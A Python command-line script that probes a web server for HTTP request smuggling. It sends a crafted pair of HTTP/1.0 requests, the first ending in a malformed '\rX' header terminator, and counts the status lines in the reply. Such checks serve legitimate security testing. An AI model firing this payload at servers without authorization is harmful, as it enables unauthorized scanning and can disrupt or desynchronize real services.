import re
import socket
import sys
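def check_vuln(host, port=80, timeout=10.0):
    r"""Check how ``host:port`` handles a malformed header terminator.

    Two HTTP/1.0 requests are written to a single connection. The header
    block of the first one ends in ``\rX`` instead of ``\r\n``. Everything
    the server sends back is collected and the HTTP status lines in it are
    counted; more than one is reported as a potential finding.

    The result is a heuristic. A status-line-shaped string inside a response
    body still counts, and an intermediary in front of the target may answer
    instead of the target itself, so a positive result needs manual
    confirmation.

    Args:
        host: Host name or address to connect to; also used verbatim as the
            ``Host`` header value.
        port: TCP port, 80 by default.
        timeout: Seconds to wait for the connection and for each read. A
            read timeout ends collection and the bytes received so far are
            still analysed, so a server that honours ``keep-alive`` cannot
            stall the check forever.

    Returns:
        None. The request, the response and the verdict are printed; any
        error is printed as ``[!] Error: ...`` rather than raised.
    """
    # Craft the payload
    smuggled_payload = (
        "GET / HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        "Connection: keep-alive\r\n"
        "\rX"  # Malformed termination
        "GET / HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )

    try:
        # Encode once so the bytes shown are exactly the bytes sent; a host
        # that cannot be represented in latin1 fails here, before connecting.
        raw_request = smuggled_payload.encode('latin1')
        print("[+] Raw request being sent:\n")
        print(raw_request.decode('latin1'))

        chunks = []
        # The context manager closes the socket on every path, including errors.
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(raw_request)
            while True:
                try:
                    chunk = s.recv(4096)
                except socket.timeout:
                    # Server kept the connection open; analyse what arrived.
                    break
                if not chunk:
                    break
                chunks.append(chunk)
        response = b"".join(chunks)

        print("\n[+] Raw response received:\n")
        # latin1 maps every byte to one character, so nothing is lost on display.
        print(response.decode('latin1', errors='replace'))

        # Count status-line prefixes ("HTTP/1.0 200") rather than every
        # "HTTP/" substring, which also matches ordinary body text.
        status_lines = re.findall(rb"HTTP/\d\.\d \d{3}", response)
        if len(status_lines) > 1:
            print("\n[!] Potential vulnerability detected: multiple HTTP responses found.")
        else:
            print("\n[*] No multiple HTTP responses found.")
    except Exception as e:
        print(f"[!] Error: {e}")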
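if __name__ == "__main__":
    # Command-line entry point: <host> is required, [port] defaults to 80.
    usage = f"Usage: python {sys.argv[0]} <host> [port]"
    if len(sys.argv) < 2:
        print(usage)
        sys.exit(1)

    target_host = sys.argv[1]
    target_port = 80
    if len(sys.argv) > 2:
        # Reject a non-numeric or out-of-range port with a usage message
        # instead of letting int() end the script with a traceback.
        try:
            target_port = int(sys.argv[2])
        except ValueError:
            target_port = -1
        if not 1 <= target_port <= 65535:
            print(f"[!] Invalid port: {sys.argv[2]!r}")
            print(usage)
            sys.exit(1)

    check_vuln(target_host, target_port)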